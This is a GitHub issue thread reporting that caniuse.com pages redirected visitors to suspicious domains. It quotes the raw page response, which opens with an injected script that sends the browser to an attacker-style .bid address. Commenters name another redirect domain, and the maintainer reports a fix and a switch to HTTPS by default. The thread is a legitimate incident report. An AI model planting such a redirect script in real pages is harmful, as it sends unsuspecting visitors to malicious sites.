### ISSUE TITLE
caniuse.com Hacked?

### ISSUE THREAD

**Issue by nextend** [Fyrd/caniuse#3833]
In the Google result page I have experienced some strange redirectons.
Here is a page which redirected: https://caniuse.com/pointer-events/embed
To: http://lab5upport305111234.bid/index/?2471509871574

Raw response:
```
<script>window.location.replace("http://lab5upport305111234.bid/index/?2471509871574");window.location.href = "http://lab5upport305111234.bid/index/?2471509871574";</script><!doctype html>
<!--[if lte IE 9]><html dir="ltr" lang="en-US" class="old-ie  no-js"><![endif]-->
<!--[if gt IE 9]><!--><html dir="ltr" lang="en-US" class="no-js"><!--<![endif]-->
<head>
	<meta charset="utf-8" />
	<title>Can I use CSS pointer-events</title>

	<meta name="viewport" content="width=device-width">

    <link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Open+Sans:300,700">
	<link rel="stylesheet" href="/css/dark.css" media="all">
```

**Comment by omridevk** [comment]
Keep redirecting to:
top.lovike.xyz

**Comment by nextend** [comment]
@Fyrd ?

**Comment by omridevk** [comment]
I don't think it happens when you access the site via HTTPS, however, Google search results redirect to HTTP instead of HTTPS.

**Comment by Fyrd** [comment]
Spent the past two days on this, cautiously optimistic that it's been solved now. Also defaulting to HTTPS by default so that should help.
